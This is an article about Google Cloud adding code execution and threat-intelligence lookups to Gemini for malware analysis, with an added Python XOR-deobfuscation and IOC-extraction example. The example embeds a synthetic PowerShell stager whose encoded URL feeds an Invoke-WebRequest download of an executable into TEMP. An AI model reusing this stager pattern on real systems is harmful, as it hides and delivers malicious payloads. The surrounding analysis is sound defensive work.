Google Cloud has given Gemini, its AI malware-analysis assistant, new tools to help automate the reversal of obfuscation techniques and obtain real-time insight into indicators of compromise (IOCs), through the integration of Code Interpreter and Google Threat Intelligence (GTI) function calling.
Code Interpreter gives Gemini the ability to write and execute code that decodes specific elements of a malware sample, such as strings encoded with an XOR algorithm. Because the decoded value comes from running the routine rather than from the model guessing at it, the aim is to reduce misinterpretation and the manual intervention it would otherwise require.
GTI function calling expands Gemini's reach by retrieving contextualised information from Google Threat Intelligence about suspicious external resources, so the resulting insight is verified against threat intelligence rather than inferred by the model.
The challenge for malware analysts is that malware authors use obfuscation to conceal IOCs and the underlying logic, and malware often downloads additional malicious code at runtime, making it difficult to understand a sample's behaviour from the initial file alone.
Together, these tools can improve understanding of malware behaviour by decoding obfuscated elements and supplying context on what they reveal, which in turn improves threat mitigation.
With these tools integrated, Gemini has autonomously identified that a PowerShell script contained an obfuscated URL and deobfuscated it without human intervention. The recovered URL was then used to query Google Threat Intelligence for additional context on the URLs, IP addresses, and domains related to the malware sample.
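The following is an added example, not code from the article and not Google's Code Interpreter output, showing the kind of routine an analyst (or a code-generating assistant) writes for the case described above: a PowerShell stager that hides its download URL in an XOR-encoded byte array. The sample script, the key 0x5A, the TEST-NET-2 address it decodes to (RFC 5737, not a real IOC) and every function name are this example's own constructions. It goes one step beyond the article's scenario by also recovering the key with a known-plaintext search when the script does not state it literally; the GTI lookup that would follow is a network call and is deliberately left out.

```python
"""XOR-string deobfuscation and IOC extraction for a PowerShell stager.

Added example: synthetic sample, hypothetical helper names, no network access.
"""
import re
from urllib.parse import urlparse

# Constructed sample (synthetic, written for this example). The byte array is
# "http://198.51.100.23/s2.ps1" XORed with the single-byte key 0x5A.
SAMPLE_PS1 = r'''
$k = 0x5A
$b = @(0x32,0x2E,0x2E,0x2A,0x60,0x75,0x75,0x6B,0x63,0x62,0x74,0x6F,0x6B,0x74,
       0x6B,0x6A,0x6A,0x74,0x68,0x69,0x75,0x29,0x68,0x74,0x2A,0x29,0x6B)
$u = -join ($b | ForEach-Object { [char]($_ -bxor $k) })
Invoke-WebRequest -Uri $u -OutFile "$env:TEMP\svc.exe"
'''

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")


def extract_xor_blob(script: str):
    """Return (encoded bytes, key or None) from a script using `-bxor $var`."""
    m = re.search(r"@\(\s*((?:0x[0-9A-Fa-f]{2}\s*,?\s*)+)\)", script)
    if not m:
        raise ValueError("no hex byte array found")
    data = bytes(int(t, 16) for t in re.findall(r"0x[0-9A-Fa-f]{2}", m.group(1)))
    key = None
    km = re.search(r"-bxor\s+\$(\w+)", script)
    if km:
        # Only trust a key that is assigned as a plain literal in the script.
        vm = re.search(r"\$" + re.escape(km.group(1)) +
                       r"\s*=\s*(0x[0-9A-Fa-f]{1,2}|\d+)", script)
        if vm:
            key = int(vm.group(1), 0)
    return data, key


def xor_decode(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_single_byte_key(data: bytes, crib: bytes = b"http"):
    """Known-plaintext fallback: every single-byte key whose output starts
    with the crib and is entirely printable ASCII. Usually exactly one hit."""
    hits = []
    for key in range(256):
        out = xor_decode(data, key)
        if out.startswith(crib) and all(0x20 <= b < 0x7F for b in out):
            hits.append(key)
    return hits


def extract_iocs(text: str) -> dict:
    """Split decoded text into the URL / host / IP values a GTI query needs."""
    urls = sorted(set(URL_RE.findall(text)))
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    ips = sorted(h for h in hosts if IPV4_RE.fullmatch(h))
    return {"urls": urls, "hosts": hosts, "ips": ips}


def analyse(script: str) -> dict:
    """Decode the hidden string and return the IOCs it contains."""
    data, key = extract_xor_blob(script)
    candidates = [key] if key is not None else recover_single_byte_key(data)
    if not candidates:
        raise ValueError("could not recover a single-byte XOR key")
    decoded = xor_decode(data, candidates[0]).decode("ascii", errors="replace")
    return {"key": candidates[0], "decoded": decoded, "iocs": extract_iocs(decoded)}


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(SAMPLE_PS1), indent=2))
```

The printable-ASCII filter in `recover_single_byte_key` is what keeps the brute-force path honest: on a real sample the crib alone can match several keys on the first few bytes, and a decoded URL that contains control characters is a wrong key, not an IOC. The dictionary `analyse` returns is the shape of input one would pass on to a threat-intelligence lookup; nothing here performs that lookup.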
Further enhancements will continue to develop Gemini's autonomy and adaptability in working through complex samples, so that users can understand the behaviour of many types of malware more effectively.
Google Cloud is committed to empowering the cybersecurity community with modern tools, and future updates aim to extend Gemini's capabilities, moving it closer to a more autonomous and adaptive approach to threat intelligence automation.